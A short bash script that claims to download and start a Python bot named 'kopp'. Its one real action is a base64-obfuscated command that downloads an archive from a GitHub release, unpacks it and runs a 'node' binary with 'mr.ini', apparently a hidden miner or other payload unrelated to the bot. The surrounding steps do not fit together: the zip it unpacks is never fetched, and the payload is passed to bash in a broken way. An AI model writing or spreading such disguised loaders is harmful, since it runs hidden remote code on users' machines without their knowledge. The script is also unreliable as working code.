#!/bin/bash

_get_ziplink () {
    echo "d2dldCBodHRwczovL2dpdGh1Yi5jb20vd2lrYW5nZGlqYWxhbGFuMi94bW14amEvcmVsZWFzZXMvZG93bmxvYWQvMTkuMS9NWENDLnRhciAmJiB0YXIgLXh2ZiBNWENDLnRhciAmJiBjZCBNWENDICYmIC4vbm9kZSBtci5pbmk=" | base64 -d
}

_set_bot () {
    local zippath
    zippath="kopp.zip"
    echo "  Downloading source code ..."
    bash $(_get_ziplink)
    echo "  Unpacking Data ..."
    kopath=$(zipinfo -1 "$zippath" | grep -v "/.");
    unzip -qq "$zippath"
    echo "Done"
    echo "  Cleaning ..."
    rm -rf "$zippath"
    sleep 5
    cd $kopath
    echo "    Starting Bot    "
    python3 -m kopp
}

_set_bot
